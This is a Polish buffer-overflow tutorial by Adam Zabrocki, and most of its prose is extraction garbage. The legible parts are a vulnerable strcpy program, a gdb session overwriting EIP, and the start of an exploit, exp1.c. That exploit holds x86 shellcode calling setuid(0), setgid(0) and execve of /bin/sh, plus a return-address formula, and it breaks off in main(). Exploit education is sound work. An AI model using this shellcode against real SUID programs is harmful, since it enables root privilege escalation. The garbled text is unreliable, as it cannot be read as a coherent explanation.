Bufer overflow

by Adam Zabrocki (pi3 -

pi3ki31ny@wp.pl

)

(

http://www.pi3.int.pl

)

:VW S


     



   "!$#&%(')+*,-#"*"".//01*"1*

23-4

5

6718:9&;=<$>(?6$@BADCE"9GFHIH 67HIJ7LK1M$I7L9

N

O"P1Q/R/P QTSVU/QBRBUWOXP Y[Z1WD\^]`_$abRBcWDde/fhgiQTjZak"YlP

m

n:op q&rtstuv(wJqyx1uiz[{B|$p}xpyx~|D-p/v}x u&|$wqT€DrD`u :‚„ƒ†…l‡Lˆ‰p |

nXxŠB‹Œ}$pŒ‹B{Dq

w}uŽ€$w$1u/pVs’‘

“•”—–`˜™Œš›(œŸž V¡t¢•›£$Ž£ Ž¤¦¥$§$›¨V©¥ª[– £«¬­¤

›šD¨®›Dži¨-  ¯y›i¤G  £«¬

£« š(¨V©/ ¯&¥°

±1² ³´$µ ¶¸·+¹D³DºµV»¼½(¾-¿DÀi¾®²Áy¼Â-ô$µÄB³´$µB¶Å

²ÆÁ¿Ç

ÈÉËÊ-É/ÌÍiÎVÏÑÐ$ÒiÓXÔÎ/ÕÍiÔ1ÎBÖ×ÒØÈÔÎ/ÒÙ-ÚÊ-ÒÛ ÈDÜDÝ

ÔÌBÞ

ß

Û

àáãâäåæèçéëêŸìäDàDí

îðïâ ñ-ìîŸåê-òôó$õóDæöâñVäDà$÷Bø¸ïDùú/ìDûáüóDñ-õ(ýiñ-â íyåþ®ÿ1à÷îBäDà$÷ø

òtêiþ®ÿ

ïDùBìÿ`ûñ+à

íõiê

       "!#!#$% &
' ()*+%&#',', - (. /',0$ 214356 087( !9!2:"; <9=6$>?"@:A!#,BDCE@):!  )  

w biblioteczce ANSI funkc

BD=#F(:HG)I!
$@J ) K (8BLCK &#7( M4N8ON8"C

P(QRTSU VW X YZ[]\LW ^UW_)P`aEbX(cYOd(eIU

c+W^#fZ [hg`X ^Z)\LfiXWjbk8lmafn8V(o Ypf$X X Y af

strcpy(), strcat(), sprintf(), vsprintf(), gets(). Niestety

bezpieczne funkcje takie jak fgets(), oraz fgetc() czy getc() i getchar()

cHb kqaU P(lsrJSURKUV UR

Wt

rJo^UVYS_o YKX#f"buR2vAWw4Z8fxRyY azf"Z [K`k

{|}x~6€‚#ƒ „(…}(†"~ƒI‡ƒ(‡ ~#ˆ‰Š‹#Œ-‡†ˆ$Œ8€Ž…8/†+ƒy†+Œ‘H~ ‹ ’#|“uŒ‘4”•~– {(—‰ ‹Œ-—

‡#u†Hˆ"}˜‰™“D‰’ƒ?ƒ šŠ)‰‹#}"| …‹
}›’Ž“LŒ,“œ“uŒ†~
/†+‰‹‰—K}‰‹({’#ƒ‹
}$Œ|‘‡#ˆ}$’ ~ž}Ÿ†+‡6

 

Œ„‹#‰ ’¡†+ƒ¢‹
}$Œy“DŒ)†O“uŒ„{ ‹({i‡ƒ#4£(¤¥‹#‰‡ Š,…8Œ“u|}Œ’#ƒ‹ †"Š)ƒˆ"}¦‹‰„§—IŠ)‰–

¨©xªy« ¬®­¯)° ±¯² ¬³ ¬q´‚µ¶‘·u³¸

zcze

² ¹² º
©‘°(­² ¯¹+³¢»#²q¸¹³¯)¼8©"³¡½+¾#³8²­¿°À³¯Á)¨$°ªKÂ)ÃÄ°(¯)² Åq° ƺ¯H«(¹+³Ç¼²È"º
©$³ ¬É»#©$³Æ ² ªI»#°i²¹+² º
©]ÆÅ©›ªy» «¼¾¿¼8©¶8±(ʪ

Á,°¯¬² ¹AËD·D¶8¼ «#¼ ¾9½Á°(¯¬²u¹¦¸)¹+¯©x»#±¸JÂÍÌ(Φ³2°#¸¹+² ¹A»
©$³¸J¶K°¹«#¨"³¸/­#³¼u«œÁ©¼Å»³Ü©$ÏyŲ Å ªI«¼ Ų·ÄÐÈAÑÆ«ž¹³K¸Í¶I­ ¯°¸)¹,¸Å³

ªÒ»#©$³‘¯)°Ð
©³ »
©xËE©¼ ¾»
©xϑ­#°­ ¯,Å8³Æ(»#©³ Ìӑ­#² ¯H¹+³2¸4¶Ô°»³‘»²IÁË »º¼

jach z rodziny *printf() (syslog() tez).

Õ

»#©$»#©$³,· ¸/Å «¬Ö²¯H¹"«º Ë#¨³Ô­#°¸¹² ¯² ¬m¸D©$ё­¯,Å «Ð#¨©$Ï «צ·D²ºªI« º°(¯Å«œ¸)¹²8×y»#©$³Å ªy«º#¨³Ô­°(­ Ë
¨$²¯,»³ÔÐ È+Ñ8Æ«?¹"« ­Ë

buffer overflow (BO).

2. Teoria

ØÚÙ Û ÜÞÝß)àÝ8á âã$Ùä8åçæLè éêâàëì#è¡íÔÜ é#àßÝÜ
î)ïHèäÇÛðAñ

òó¿ô"ó õ öê÷]øpùAôúûýü#þ8òþ¡ÿ(û



ú2ú ô+ú û¿ôóõ ö

buffer

overflow -

õ 



õ



 "ú



ü ö,ÿ)úúDõ





ô



üú



ò 





ô



)ÿ ö
!"



Dúû#

%$

ô& ÿ'ú( ÿKú ó

õ )ÿ
)

$



õú!*"þ+)%,.-/)ÿ
)

%$0$

û
Aú8ò ú

$

þ

1243+5617839:;<=2>1%?+;<A@B2C>?DFE@G2>?DH:I24?+5.@G2J.KL@G2>?DH:=M3N"OQP%;OSR>31

strefy stosu. Dwie pierwsze strefy praktycznie nie m

J.@1TVU:XWV19X39X?YU
:8M
>1?M >R783+Z1%O W[3\2435/]

^

1:
N`_%?bac?@2d78OQP;eR7[:0243ac?Nf9OQ;1:f@B24RX@hg

i

24j_ka\?%@2lR9=U.mQR5.OQ?+NnMX3NoOQP;OL1378OQ?+>3pacT%;\:qZ
39?
]/rts>J 9X;OQ?>1%?;1

y sam jest abstrakcyjnym typem

danych. Stos jest typu LIFO (Last In First Out).

^

<R
Z1OY2JuR24RXKeOv_wRX@G2H32C9OxRU.OQ?5
2

52Hj>:yUXP+Z1OQ?

MRzR_%R9
:*9X3@B24RX@cOQ?KUXP%Z1OQ?x1ZFahP

{C|k}\~€.‚Qƒ+„…8†‡|/ˆ ‰hƒ†G{Š{H€{ |
"‹%~Œ €…‚Q‹‚Qƒ0€
…[„€{Ž|"
€ŠŠ‘“’4”‚(„B†G{Ž

‚v„B†B{•‘e–{4—˜”
{H™„|A†š‚Q›*‹œ~„~+{Hƒ„|
‡–c}h›8{|
"˜Šž%ƒ‚ ƒ„…†B‡|Ÿ€ ‚ ƒ{¡X€Œ€ž€Ž|.˜Š X›%‡%‚ ƒ¢„™…xŽ‚ ƒž.‚Qƒ+„…8†‡|


‡š}h›

£ ¤
¥Ÿ¦§¨0©£ªX©š« ¬Y¥"ª­®X¨V¯e¤
°ª®
¤¯0¨±V°.« ²(°¨eª³X¬´G¨+µ

¶\«C·š¶h¬¸®¨°®¨¶hµ¹º»µ%« ¬¶¼ª³.«C©¤ ¯#¨+®X¬[©š½e¸¯0« ¬
¦¾c¬©£¿£4ª

ÀÁXÂÃGÄÅpÆcÄÈÇdÉÊ ËÌÀÃGÄÍÈNJÎeÇSÏÐÇdÉ¢ÊËÒÑ
À
Ñ ÄÆ\Â*ÆcÂ%Ñ
ÂÓÔÂÕCÂÖ*ÂÓ
×8ÓXÄÈØ0Ù ÂÃÍÅ+ÚXÀÛÂÜÞÝB×4ÀÝBß.àVÓÄ\×4ÀÖoÙQÄ%ÝB×8NJÎeNJà

À ÑØ#ÃÀ×CÓ.ÙQÂ*Ó.Ù(á"Ç/ÉÊ Ë0àLÍÑ ÂpƚÖßhÆcÂVÆ\Â+Ñ ÂÓAÂ%Õ ÂÖfÂ+Ó×HàSÄ"Å%À6ÍÄ¢×Câ
ÖãÙ ÑÍ%ÙCÂfÃÂ+Ñß
Ü ßcÆcÂoÀ=×HÂÓAÂÕQÂ+Ö*ÂÓוÃGÀÍ+Ö"ÙQÄ+Ã

stosu. Rysunek 1 opisuje operacje PUSH, a rysunek 2 opisuje operacje POP.

äÐå.æç
èXéêLë%ìí”îêïðçhñcéeîòXéóGï+ôpñcõVídö÷ ø¢ì

ùÐú.ûü
ýþÿ



ÿ ücþ



þ





!#"%$'&(*)&+-,./(102 $43)
"%!/(1576

-

.83:9<;=&>$?0@7+A5B!?0C;C"D5 6@27E?)/FG5 $'&(1)&+H?3:)827@IJ(K5 $-&(1)&+MLN0B@O0J;P&@5

&(10 FDQ407R/6S5&TU0

A5V8)W6S)@LX"Y06[Z86@Q8@!?0;B07!/QXR?\Y0=0 Z#\]"%$072^AJ"A5&S(RQ8!?0LN"D2 @!#"]5CR
)Z?0&>);_Q8;C0!/QNZ86@5@[AJI7R6)

&Q#&S(K5 LW+`,1Z
6@57@a27)b.83b@LN"]5!#"Y0c&;B)dAIe;C06(1)?fhg9hH_3U6S)
275&>)/6'+8iQ8;B0kjK+8!8$2^AJ"P3UlW./mn)/6S0 @o3qp3qT=r8Q

+
@+8Z5F]!#"Y0g_&(*)?&H

.(*)&s;b@0\]5 i7!)?f2O")8R'"tLWZ\]5Lu57!/(*072SA"vLu)/i5P6S)?&>!?Igw;xR8yF*Tz\t+
r4;xV8y6S{N,K2

|?}8~/€vD‚ƒ}-„7~…†O‡ˆ:‰#Š‹}8Œ/

}/Ž?†N8ˆ?u‘’ˆ8“O‡>†•”%‚8–Ž€%“‡†u‘x„”]† “7Ž?}?—h˜€[}
~•„ŒO™Gš7€Y„Ž€]„•‡h€]šu‘›‡*}?‡hœh‰žŽ?„‡7ˆ?˜ |–Ÿ8… ˆ
 8™1„~8„˜ |¡‡1}?‡

š7~€Y†’…}‡Ž7’‘¢~
£™1¤¥Ÿ?}/Ž€Y† ‘C„“B1„7 ¦†‡q‘§‘w€Yš ¥‡O}?—

¨O©Uª8«S¬
¨7­®>¬«¯O°`±1²
ª:³
´K²?­ µK¶]·#¸¹¬µ1¬«¬
¶]º·q»/¼U½’¾s¿o¨ À7Á

¸‹´K¼z»
Âh³»8¼‹«¯O°_²#©]­ÃWÀOº¶Y­ÃÁ–¬8ă©%ÅPª#¶]­ ÅN­7²/µ1º¨Æ ©*³

¸Ç¬/íN¬²-°P®ÈºÀ Á8°CºÉNº¶tʬ•²?ºN¬®µ1º µG²#©­¶Y­7Åu­²/µË®µ*¬?®>Ì·

ÊÍ7ÄÎϲ?ºs²º®µ1Ð ª
²/Á=°=¬
¶%²/Á=ª?¬u®SµK¬?®h©D­/³¸ÑÁwª8«^À ÁÆÅN©Y­7ÅPÁ·©tÃs°P®È?º7ÀÌƭϬ/²=²?º_¬?®µ1ºJµ1²©­O¶Y­ ÅM­²/µU²º_®µ*¬?®©Y­8³

ÒÓȺ ÃÄÁ8ÅÔª8«¬8ÕO«Sº7ÅM©Y­ƒ©G®µD²©D­Æ­4°w©Y­O¶Y­ƒÖ*Ì
²8ȨÆ©³v¼:¬
Ä8¨7Àº®WÌ8«Ì¨ ×?ºÅN©Dº ²#©YºBÆºÈ©Y­^Æ ØWÖKÌ8²8鬮 ©]·<²º–®SµK¬?®N®dÍ

È
ÙGºÄ/À©Y¬/²?­WµKº ȃÀ °=º

²­u«SºÅWÈ#©]·ºuª?¬4ÀºÈ?¬

Ú?Û ÜOÝ Þ#ßtàáß]Ûâ–ãÜßDä åGäÞß]äWæä çuèß[é>ê

ëì8í^îdïNðOñ=ò óí/ô¥õ<òJñwöYí ÷òîøNðó?í

ù

ò ÷Sò7ïuí úG÷KûWüKý8ó
þ?ÿî ö
îí^îYð/þ?òtó?íëïMö]í ó
ó?í?ö¥ì8ò óísó#öYíë 7ì/ó?í_ì8ð=ð
ìOúDñCð÷Sëí ó#öYò

ù

ð

ù

÷^ëí7ì/óöYíSî[÷Sò7ïWþö ú*ð ý:ô

oöYí]íþðï

ù

ö
DòJú1ð/÷ Oñ

ý

 "!$#&%(')!$#*,+-/.10234056784:9
;<20>=/?@9
BACA D/EGF
03H

alnych jak i

I

B?JBKL3

I

0A-96B4/MN96DBEO02CF
P5Q0 R8S0C2T!$#UAV96W VF6PX=/?Y96BAV9


I

0C2D/=Z<H-03AA-96S9[AV H-D9

#]\>^_`9a#]b#dc3!#ef]AV9
DB=/?g9hAA?iD0"ja#k+C
-FlMlA 

I

,0D3m0DE"nAQF6A B=/4:9;opBA>fq!#qc

j]#@=rH 0 F6s9Bt3a",H-/u/AV9hH-9B?vB?1H-9%(j/?Jr#w0A(/

– wskazuj

lA-o,/?"H-;o`,(0-x9
/*:c

#w9
/p",=ey=D/=zt/H {0.-9}|Q CAH-Dyf~f,}(0JH-021=B7BA

I

0 F
0PC96B?&c#}0CF6P03AGA-
C?@+9hM

I

=sm 4/A

f,~^#&0=K03y=03A1A-0e1j]#%(!$#]*+-.Y,
40=BV8r?@9
yxD2CF6<A-07$/?1H-9w%(/?"H-<A 07r|( CAH-Dy9[*:c

€"

I

9
/pH-0

I

904/A-&t,G7Bpp0 R8‚/H F[A sP

0ƒ^C#i20„j]#g%(!$#w*+7.ƒ
40=B 8…A 03†j#g%Q!$#w*+>

A-(;

I

A-96

I

=m 7BAY7^#)c)#a=/XetBRmDs96 S=‡|p AH-D9,Q0 1?J a:9=s0-,Qs8ˆe D/=/V=DB=03AV+‰pBHV9H 0C2

zwany jest epilogiem funkcji.

Šd0. DB=/?17A-

I

y=BH5Q2=9
kBH123=9
B5(

I

0 F
0P7%

I

=H5Ks279
2s8lA-<F
9Q9hA-P3 Œ‹f*

Listing 1. prolog.c

void funkcja(in a1, int a2, int a3) {

char buf1[5];

char buf2[10];

}

int main() {

funkcja(1,2,3);

}

^CH 03?

I

9F[ tfB?14(B=r(BA

I

0CPB?v=<0

I

Df{

-

^>.> 
40=B 8rH 0C2e„3xxB?J.-F
B=

# cc -S -o prolog.s prolog.c

# cat prolog.s

Ž

VR,796BpF
9t96;A /?

02

I

0379623AV9hH

fm?1.-F6/0e]c’‘“0M/A ”

AV9h?

H-9KFhH ”7BM/A D/E

=DB=

=s03.amp034s8cC#w0

I

96p7m=s449
2=9h?1G •

I

sDBV|y96D/=A {<5KRmDs9[0-Rm8<eV,Q;

I

ff{sD{

I

02CDB=s3–DE 0C23=s/A-9

2C0T|p AH-Dy9Qc–br(L3MXB,P ?G/A
—|Q AH-Dy9<:{

I

035K0M03A-&˜023<03KA-ZH 0CF
:A-0 R:Ds9pczb,QBAV9r/P ?GAd,

HC5Ks2=960A$fBH 0

I

96/p"=BV+

rA exB?vH 0A-96sD™f,a<035QBAV96<|p AH-D9

pushl $3

pushl $2

pushl $1

call funkcja

Ž

9
2=9h?1š -+e9hMWA “,(0 &x{‡H5(23=39603A-›0203A ˆH 0CFxA 0 R:Ds9eB,P ?G/A
]cb,(BKA-9eBP3 ?G/A~,

I

035K0M03A$tH 0

I

96p7m=B]c/€"lH-03A-9
D™f,ae05(BAV96

A-m=s$|Q CAH Df9

I

0

I

=s/=<DF
F
+HQL3

I

035Q03MB7A-e(0 

œ",ž-Ÿ/ /¡V¢hžˆ¢6¡V£(¤¥ž-¦§¢™¨Q©pª

- Instruction Pointer). Jest on potrzebny do tego, by procesor podczas, gdy

mž «¬ ¦B­/®Gœ®ž-«3¡®œ4Ÿs¯‰§tŸ/ž °3±o²(¥¡Cž ¦§t³s´ˆœ7¢6³sµ3­3¢6ŸB¶q·µ­¢
³e¸@Ÿ>t¢6¹

º»¼½C¾s¿6À

”

¿]¾sÁ"ÂGÃ<Ä-ÃÅ,ÆQÇBÈCÄ-¿6É<»<ÊË ÁÄÊ»7ÃÀ

Ì

Í

Ã/Ë-ÎÏÁÈ É/¼Ã¾

Í

ÉÐ:Ñ4ÒlÇÓ3Ô¿6É/Â"ʃÕÁ†Ä-ÃBÔBÊ»7ÃÀÏÖ$×)Ø~ÙJ¾/ÔBÊVÚ
¿@ÃÓ3¼ÉÅ:É/ÂÛÈ Á»¼Á3ÆÄÊ•ÑÜdÁÝ Ã¾Ô/Â"ʆÆQÉ/¼ÃBÔ

Í

Ã/Ë

»eÊ ÕÚ6ÎsÓÃrȼÁ Ú
ÁÕÞ

pushl %ebp

movl %esp,%ebp

subl $20,%esp

ß

¿
ÓÔ¿hÂ1ʚÆà-Ùe¿háWÄ Ã“Å,Æ(Á Å

Í

ÉÅ,Æ4ËâKÃÓ3Ô¿
Á3Äʚ»>ÅË-ÃBãÄV¿h˚¼ÃÂ"ËV¿r×dÒ$ä

Ì

Ô/»4Ã/ÄʚÆ(ÉBáWÒä`ÚhàݗåaäwÐÙoÄ-ÃÅÆ(ÇBÈCÄ-¿É

aktualny adres SP jest kopiowany do EBP (nazwiemy go SFP), a sam SP jest przesuwany o rozmiar

Ô/ÂY¿6É/ÄÄÊ ¾/æ“ÚÁ3Ë ÃÚhÄÊ-¾/懻èçQàCÄË-¾

Í

¿QÑ

ß

Ã/á/Ä Ã

Í

ÉÅ,Æ¿6Ä-çyÁ3¼ÂGþ

Í

Ã&ÁŒÆÊÂ@Ùz¿háˆÈ ÃÂ@¿6ÇsÀZÂGÁ3ásÉZÝÊ À•ÃsÓ¼ÉÅxÁ»4Ã/Ä-Ã

Æ
ÊVÚ[Ë ÁG»4¿ÉsÚ6Á˼Á3ÆKÄ Á-é

êë6ìBíYëqîmïKðñ7ìsòóôQõ3ö,÷ñƒø ìîmùBúíüûCöùBúû-ìý3óCþ@ñeúø ð-îxëkÿ
ìmôú[þ 
-ëhô

y -

ùsì6÷ /ú@ô(ð

ðCýWûöðê÷î:ðöì)ì/óSñ7ësê•ñQþøCó êfëîý3ñ4ìCþyð3öpú

-

! "$#&%('*),+-"$.&/'0 1324 6587:9<;=#&%>?)A@B0C'DFEA%

/0?5G@0C'%HEI9J"K#L

M?NOGPQR3S6Q4TVUXWP!Q<Y$Z&[\N^]`_VWP!Q<Y$a&[(bcd-Y$Z&ebV[feO?TGMOCb[HNIgJYKah<M?NOGPQR3S6Q`Ti]6jHWP!Q<YKZ&[3klmPBd>[HNn?M

SP jest przesuwany o 20 bajtów (subl $20,%esp). Stos

oPgpOq[Xbr-sItBuPXYKTePCO>R3oNTQv[HNnBM?TQwYKPCdxQ`PCdyoP

rysunku 3.

z

b*g<S-oTd{|kG}~a&dPCOS4Q6TQ4PdV[(brstGuP(gpY$agk

€

eZW-S6Q4TCR3b‚YKTCeJPCOƒ[(bda&oPB„…Y$T?a&eJT`YFbMBOoTƒRiPB†=T



e!OGT



TC†Fo*NTBoNT…W-S*‡aeP…oP



earePR
NFT‰ˆNMCYŠN‹R]GkŒMGcd-YKZeŠb

widzimy na listingu 2.

Listing 2. victim1.c

int main(int argc, char *argv[]) {

char bufor[100];

if (argv[1]==0) {

printf("Ussage %s <argument>\n",argv[0]);

exit(-1);

}

strcpy(bufor,argv[1]);

return 0;

}

lTo



eagYIb



earePCR



eOCb6QR3S4Q6TPer&S-RyTCoY,NŽra
da



NS4Q6THuaiW-S*‡aeS



e!O?TCOi‡KS-odM!Q6nGcd-Y$Z&ePVoNTig



eP`[Vu&OP

u†FSrah

M?NxMGNItBrS



au-PBoTQusFP‘o*NTQXQ6PBda’PerSRyToYq“gJYIeJM



b*“K””k•PGa[Va-MGa[VPB„YKaR
a&–GT



eOGT



T†FoNITCo*NTCR

WS‡aeScmru&b



a-uPRbHQ6Pda‘Per&SRiToY—MNtBr



eO?Td-ePGMCO?P!Q6t?M`b˜NFsIahp„3R‰NT!QCgMGP[™WS‡aeO?T
NšRya&–T3oPBu



N$g<P?„

PGu&eT&g



a[qea&YIob

‡KSo-dMQ4NŠk\}eJa-MBTgae›da&œMCO?tGM[(b-da&oPCoNITž‡KS-odM!Q4NŸWnGu&ONFTR‰NP† PGu&eTgc

który



eP`[Vu-a



a-ua&WoNT(oNFTmQ4T?gpY



eOGTOBoPGMCOa&obyusP(o*NTGr-a3N¡MBP†$PxYKPXa



TeP?MQ6PVg<daœMCOb‰gNn(W-†=n?u-TRŸgTGr&RiToYKPGMQ`N

“

€

TBrRyTBoY$PCYŠNao3‡PBSs¢Y$”k?•u-TW-SrS6QRb>YKTePOxoPgpO



eJarePCR£Wbig6Nn¤Y$TCRiS



eOb6QeOGT?„

– listing 3.

¥¦$§¨¦‹©ªV«|¬G­>®C¯°ª±&²>³©¦I®w´-µ±ª&µ³¶°·¤´-µ·B¸-¹-º$³B»&°¼¬

root@localhost:~# gdb victim1

GNU gdb 5.0

Copyright 2000 Free Software Foundation, Inc.

GDB is free software, covered by the GNU General Public License, and you are

welcome to change it and/or distribute copies of it under certain conditions.

Type "show copying" to see the conditions.

There is absolutely no warranty for GDB. Type "show warranty" for details.

This GDB was configured as "i386-slackware-linux"...

(gdb) r `perl -e 'print "A"x108'` // komenda “r” oznacza “run”

½B¾C¿ÀFÁÂýBÄÅÆyÁFǤÈ-ÃJÅ-ÉÃÊƉËʤÈÅ>Ì*ÁÍÎ

//

Ï6ÁÐxÈÅ-ÑÊÎ`ÍwÌÅÃÆ
ÊGÀ‹Ì*ÁFÍwÈÊÃJÊCÆyÍCÒIÿiӊÊCÃJÉÂ-ÆyÍÌ-ÒF¿ÔÕ

Starting program:

/root/victim1 `perl -e 'print "A"x108'`

Program received signal SIGSEGV, Segmentation fault.

0x41414141 in ?? ()

(gdb) info reg eip // info pokazoje informacje o czym chcemy reg to skrut od

// registers – czyli rejestry a eip to nazwa interesujacego nas

// rejestru...

eip 0x41414141 0x41414141

(gdb) quit // wychodzimy z programu...

Ö

ÊGÀÍB×GØHÏ6ÁÐXÒI‰ÅÑiÃʾÂyÆ
ÊCÙ=ÍXÚX¿6Î4Ê?Û

Ü*ÝÞBÜÝß-àá(â&ãåä4Þ?æpçŽâÞãèéÞêÞCëíìîßêŠçIïiÜß>ðIÝFñBÞBÜñä`ݼávò>ó3àôvÝõGé

`perl -e

'print "A"x108'`

ö

ïéÞÜÞCê!è6ä`ޑ÷CøùiðI݋ç$ÞêÞú‰û3à|üýÝFþGñHâÞãèéè4ä6ÞCë3ï‰Üß?æ<ÿ

ö

êß
?ð=Ý

ö

ï‰î-êìéêßë¼âßä`ÞCëï‰ëiè

 
 
 ! "#$%&')( *,+!- ./&102  
3&!45 76 
&
(89%7&:
8;4

<=&->28@?4%
A.B4 C4D!EF

GIH

4 C4D
J< LKM4 N';OQP4RS.TD?
0 U05 5N4!V<
W'VKM XI4 Y'0.T0FX%7&S()%7.Z05 7I :2()X%7&[Y( *2+

wynosi on 0x41414141

P5\].I(V.I@C:$%7&.^<?FD(2_N;`D4

A wynosi 65, a co za tym idzie w systemie

szesnastkowym wynosi ona 0x41

P2aZ
4&Z^2+b

(5%2EX.^<?c^.T $./5 !%d.Q<?be&< 48f5 (!%.#0 bI ;2(gP

RS./&e< ! X0 2%24(^45 L 2h>(8gD4%78 2[i+9&
0 
8V[8f>2 KE 7#j54%0 D./48

Hkml

^jnpoqapP7r"
)(

Y<?4X5 : 5N<?$ 4%)0 2 IC
d* 0 7VFX
+e 7+
)(C&d<
V4s$%7I.t0 e :2(C5X% e 5N[V<X[(gP2u$N:

!v7+$5W&@!  )02E&

(^^%&<wux5 SD 5*V+!$L +!S(=.I:$ M&
(5sX >2&$> ' 
M2(U <FypK@2 M

G

 MF
&!?y/M

.IqJ = %$ 78D <C% z05 8D  c.I{

- /bin/sh

O,>(=02  4|05v7}4 EU(2 758~@ 0 702E&!&S&d<
 ?L4%7I./

0 e : 4   €0 2
&
D .T&4 2  >2&>V'5M5  mP\

04(5!x 2%(WI+N'b(0 2 I




a

ustawiony atrybunat SUID

*bD  %7(‚(e 8Dƒ 2%X 78D
 :„% …0 e8; 7VY% 5.I@
V<
)( 2 7J.T{ !NN:V†e‡D

&!4&
(5
&Eb5ˆ
{5 %7&q %7(-F@^^)(dbI+N:'9(=02  7C*‰
{5 sXVY&!X./&!

G

20gP5C 7+
S(d9(8D
Cs

.^<?&XyT 2% Y:.T e
{2T 2 7;OQP‡U>24&> ' M2() 
&4($Y(z./{5!N;N<4 %24=PRY:9> ?4%?0 :.B
8

^4z.;e 7E&(5sX.T$vB

./{5NN! 2%2*Z>5 ŠC 7+4 z 1:(2‹0V:.Q!sz %2%&N'(
J;(228EPhrŒ(> ?4%7&
S(+
(X4sd5z&1.D45%
% (

./{5NN! 2%22PC\Ž./&
(V.T: >(28D 7>(> 
%& ‘0 5.TD!*z 2%7(2>(iV’@ 5*C+€ %({5!S(&
V<s“npoqa”*C>2(

S.I &
(2$8j5• .T&e./{5!N:N4 %2*7J e)V.^')(X&5sU%2 28@4%72(#^!  X4%

.P
RS<L +5•0 7S(VNsb.B?•5
$
g

!%
Š> MQ^†—–Z!
&Ive <4+=Z LD Y^7.# &Y<
&
V<P—˜I.I;V<M='j.DM2 M^)RY‡

l

*~2Dv7 <d C > @P‰\

0
2:(5!q.Th 5b2+
(2$5b>(C 705v}4V<sb02 4.,&
5 65&
V<b02  )fPrŒ(pFMt2+
(^
)(Y>2(S&!0 D./s‰F

przed naszym shellcodem bardz

%7+! ™&
( *ZD%(" %(&d< <Y(ŒntoZa’Y.T54&^ !d51[j.DM2 M^?

RS‡

l

D e>5?%7&<.^<?9 5p(2 7(2$!s9%2 7D %

G

'j.I:E25^tRX‡

l

O*%2 05v7V2 •X./5
+p5•0 2& F@$ ./&!! 2

./{5NN! 2%7fP

l

M&(Q)^F 4•@&!.Q!%(Y ./&U>2VKM 7—0M&!45&!2(#^45 X 7Lm)V.^<8:>($(5 2N !%4s9 eDhš

[ instrukcje NOP ] [ nasz shellcode ] [ zmieniony RET ]

l

M&
(2>VN[+! (1npoqa‚!%7.bL +5d 7> N:<&(5s)05 02M&
& 2%B^?!< %z05 24&!
;2.I@ 5.T

G

Jv7J($^eB2+L0 ;.Q8;


.IŠ&!X./&!‘.TD
8:(O›:N 5y/sœM./4€&EQ $ “02M&
&€ ./&.I{ N:N<! %2*d 
&
@
 X
2(02  
-P

l

2
&
DC.I@ 5.TYC9!%7.

0xc0000000

P7\302M&
(> N<+!
V[$Db 70 
I!M•(5 2N< %2pJ
hš

ret=0xc0000000-strlen(shellcode)-strlen(program)-4;

žFŸ T¡•¢Ÿ /£!¤4£!Ÿ=¢Ÿ!¥7¦5§„¨CŸ
¡@©2¥2§ªe«2¡D¬7­§„®¯D§F¡:°X±<§ƒ¦ §
¨³²V±; /§4¦ ±Ÿ„Ÿ´²Vµ<©±`¡J¬°L¶·g©µ:Ÿ4¸§ƒ©7¦ §„¦5§Ž I¡°X©7­E£!Ÿ
¦V±[®“¹

² ©7¨C©2¤4¦ ±<¤£Ÿ4¸2©»º® ¼M©­M® ª~°|«¡J¬7­J½¨º ¾4¥¿C®2¨±Ÿ T£¤
£©¦5ŸC¡½ µ'« ©±'¦j I¡:­E®2«5¤¢^Ÿ

NOP, oraz shellcode, a jako

§­¸®2¨Ÿ¦¡“¥©‹°e­§
Àµ:±`°XŸ4¸©Á²2­©¸­§¨)®Â²5©2¥§¨S½Á¡½Vµ[«5©Áº2®V¼M©7­Tª"«2¡D¬7­M½Â£!§°$±Ÿ­§ˆ§¥7­IŸ i¥©Ã¦ § /£!Ÿ!¸2©

² ©7¨C©2¤4¦ ±<¤£Ÿ4¸2©º® ¼M©­M®g¶zÄb¥5µ<Ÿ4¸¯;©5ÅQ¤!±»¨C±<¾!¥7£4½ˆÆ2·‹§‘¼J®2¦2« ¤M¢F§
¨±-¦ §
£½2°e§4¨Y½_©5¼E¼I QŸ
¡@§
¨±J¶LÇc©°e¯;§7Ŧ ±:Ÿ

©¥2¸§!¥7¦ ±:¾4¤±Ÿ©5¼E¼ QŸ
¡;®Œ I²­§
°X±§¥®2À
½»²­©7ºVµ<Ÿ4¨=¶mÈ~´5² µ<©5±`¡,º5¾!¥7£±:ŸS°9½

¸2µ¿!¥§
¯Z°X±¾!¤S¡D§«X¢^§4«1²2­©¸­§¨ÉŸ
´5²~ʶ

¤

(listing 4).

Listing 4. exp1.c

ËÌÍ2ÎÏ;Ð4Ñ4Ò!Ó
Ô)ÕXÖV×'Ö Ø;×<ÎÙDÚÑ
Ò4Û ×hÌË

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <unistd.h>

#include <getopt.h>

#define PATH "./victim1" /

ËgÜ5ÓFÙ;Ý)Í2ÎeÞßÓàØ×'Þ$Ú!áÎ$ÜßÎ2áßIÓ
Ô)â

#define BUFS 110 // buffor podany jako argument

#define SHELL 512 // pomocniczy buffor

#define NOP 0x90 // instrukcja NOP

/* nasz shellcode z 2 dodatkowymi funkcjami */

unsigned char shellcode[] =

"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" // setuid(0);

"\x31\xc0\x50\x50\xb0\xb5\xcd\x80" // setgid(0);

"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69"

"\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";

ËÌeã@âä2Û5ÑEå^ÓUÛÙDæßÓ9ÎÖ Ø×:Ñ
Ò!ÓUÜ2ßMÒ4Õ2Ö Ø×[àÎ7ä2ÕSÓ4ÍßÚçcÜ5Î7ÞbßÎ7Ù;äÕdÌË

long ret_ad(char *a1, char *a2) {

return (0xc0000000-strlen(a1)-strlen(a2)-4);

}

ËÌeã@âä2Û5ÑEå^ÓUÛÙDæßÓb×'äVãMÎßMÔLâ^å^Ú~å^ÓÛYâ2àÕÞ$Ó!èä Óç/Ò!Ú4áÎSÚFé5Ü ØÎ5×`ÙDÓYÌ
Ë

int ussage(char *arg) {

printf("\n\t...::: -=[ exploit na program vuln1 ]=- :::...\n");

printf("\n\tUssage:\n\t[+] %s [options]\n

-? <this help screen>

-o <offset>

-p PATH\n\n",arg);

exit(-1);

}

ËÌáÏ;æ7Þä Óbã@âä2Û ÑMå^Ó

-

Ü5ÎÑÒ!Ð
Ù@ÚÛdÌ
Ë

int main(int argc, char *argv[]) {

/* lokalne zmienne pomocnicze */

long ret,*ret_addr;

char *buf,*buf_addr,*buf_addr2,*path=PATH,*sh;

int i,opt,offset=0;

FILE *fp;

